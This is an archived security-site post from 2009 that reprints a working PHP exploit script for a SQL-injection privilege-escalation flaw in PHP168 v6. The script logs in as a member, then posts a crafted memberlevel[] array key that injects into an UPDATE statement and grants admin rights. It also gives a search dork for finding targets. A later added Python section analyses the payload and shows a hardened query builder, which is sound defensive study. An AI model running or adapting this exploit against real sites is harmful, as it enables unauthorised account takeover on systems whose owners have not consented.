PHP168 v6 privilege elevation vulnerability - vulnerability warning - 黑吧安全网 (myhack58)

2009-08-23T00:00:00
ID MYHACK58:62200924366
Type myhack58
Reporter 佚名 (anonymous)
Modified 2009-08-23T00:00:00

Description


by Ryat http://www.hackgood.com

I've been busy with work every day and haven't posted on the forum for a while... I previously published a PHP168 v2008 privilege elevation vulnerability; this vulnerability sits in the same code segment. I'm giving the exploit directly; some of the details inside it are fairly interesting, and interested readers can analyze it for themselves :)

EXP:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.hackgood.com
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */

if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:  target server (ip/hostname)
path:  path to php168
user:  login username
pass:  login password
Example:
php '.$argv[0].' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

// Step 1: log in as an ordinary member and capture the passport cookie.
// Group 1 is the whole "passport=..." cookie, group 2 is the uid in front of the first %09 (tab).
$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie) {
    // Step 2: POST the crafted memberlevel[] array to member/homepage.php.
    // 0x70757265745f74 is the MySQL hex literal for "puret_t"; if that string
    // comes back in the response, the injected UPDATE was executed.
    if (strpos(send(), 'puret_t') !== false)
        exit("Exploit Success!\nYou Are Admin Now!\n");
    else
        exit("Exploit Failed!\n");
} else {
    exit("Exploit Failed!\n");
}

function rands($length = 8)
{
    $hash  = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max   = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];
    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        // Append a USR cookie with a random name; the captured uid goes into the query string.
        $cookie[1] .= ';USR='.rands()."\t31\t\t";
        // The third array key is the injection: it is not a plain group id but
        // "3,introduce=0x70757265745f74", which extends the SET clause of the UPDATE.
        $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

        $message  = "POST ".$path."member/homepage.php?uid=$cookie[2] HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n"; // was "$cookies[1]" (undefined) in the posted copy
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message  = "POST ".$path."do/login.php HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}
?>
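The part of the exploit worth understanding is the POST body: the third memberlevel[] key is not a group id but a SQL fragment, and the 0x... literal lets the attacker write a string without any quote character. The following is an added example in Python (my code, not the exploit's and not PHP168's) that parses that body the way PHP fills $_POST, builds the UPDATE under the assumption, inferred only from the payload, that homepage.php splices each memberlevel[] key and value straight into a SET clause (PHP168's real source is not on this page, and the table name php168_members is made up), decodes the hex literal the exploit greps the response for, and shows a hardened builder that rejects the key.

```python
"""
Added example, not part of the original advisory or of PHP168's code.
ASSUMPTION: the vulnerable query shape (`SET groupid=<key>, level=<value>`)
is inferred from the exploit payload; the table name is hypothetical.
"""
import re
from urllib.parse import parse_qsl

# Constructed copy of the $cmd string the exploit POSTs to member/homepage.php.
EXPLOIT_BODY = (
    "memberlevel[8]=1&memberlevel[9]=1"
    "&memberlevel[3,introduce%3D0x70757265745f74]=-1"
)

_ARRAY_KEY = re.compile(r"^([A-Za-z_]\w*)\[(.*)\]$", re.S)


def parse_php_body(body):
    """Parse a form body the way PHP fills $_POST: `name[key]=value` becomes
    $_POST['name']['key'] = 'value'. parse_qsl splits on the first '=' before
    URL-decoding, so the %3D inside the bracket survives as part of the key."""
    post = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        m = _ARRAY_KEY.match(raw_key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            post[raw_key] = value
    return post


def build_updates_vulnerable(uid, memberlevel):
    """ASSUMED vulnerable pattern: array key and value are pasted into the SET
    clause unvalidated. A key of '3,introduce=0x...' simply adds a second
    column assignment to the statement."""
    return [
        f"UPDATE php168_members SET groupid={key}, level={level} WHERE uid={int(uid)}"
        for key, level in memberlevel.items()
    ]


def build_updates_hardened(uid, memberlevel):
    """Hardened form: keys must be short decimal group ids, values must be
    small integers, and everything reaches the driver as a bound parameter."""
    stmts = []
    for key, level in memberlevel.items():
        if not re.fullmatch(r"\d{1,10}", key):
            raise ValueError(f"rejected non-numeric group id: {key!r}")
        if not re.fullmatch(r"-?\d{1,3}", level):
            raise ValueError(f"rejected level value: {level!r}")
        stmts.append((
            "UPDATE php168_members SET groupid=%s, level=%s WHERE uid=%s",
            (int(key), int(level), int(uid)),
        ))
    return stmts


def decode_mysql_hex(literal):
    """MySQL treats 0x... in a string context as a binary string, which is
    why the injection can write text without quotes or escaping."""
    if not re.fullmatch(r"0x(?:[0-9a-fA-F]{2})+", literal):
        raise ValueError("not a MySQL hex string literal")
    return bytes.fromhex(literal[2:]).decode("latin-1")


def injected_marker(memberlevel):
    """Return the text a trailing `,introduce=0x...` key fragment would write
    to the `introduce` column, or None if no key carries one. This is the
    string the exploit searches the response for to confirm success."""
    for key in memberlevel:
        m = re.search(r",\s*introduce\s*=\s*(0x[0-9a-fA-F]+)", key)
        if m:
            return decode_mysql_hex(m.group(1))
    return None


if __name__ == "__main__":
    post = parse_php_body(EXPLOIT_BODY)
    for sql in build_updates_vulnerable(100, post["memberlevel"]):
        print(sql)
    print("marker written by the injection:", injected_marker(post["memberlevel"]))
    try:
        build_updates_hardened(100, post["memberlevel"])
    except ValueError as err:
        print("hardened builder:", err)
```

The hardened builder fails closed on the whole request rather than silently skipping the bad key, so a tampered array never reaches the database; the numeric whitelist on the key is what matters, the bound parameters are defence in depth for the value.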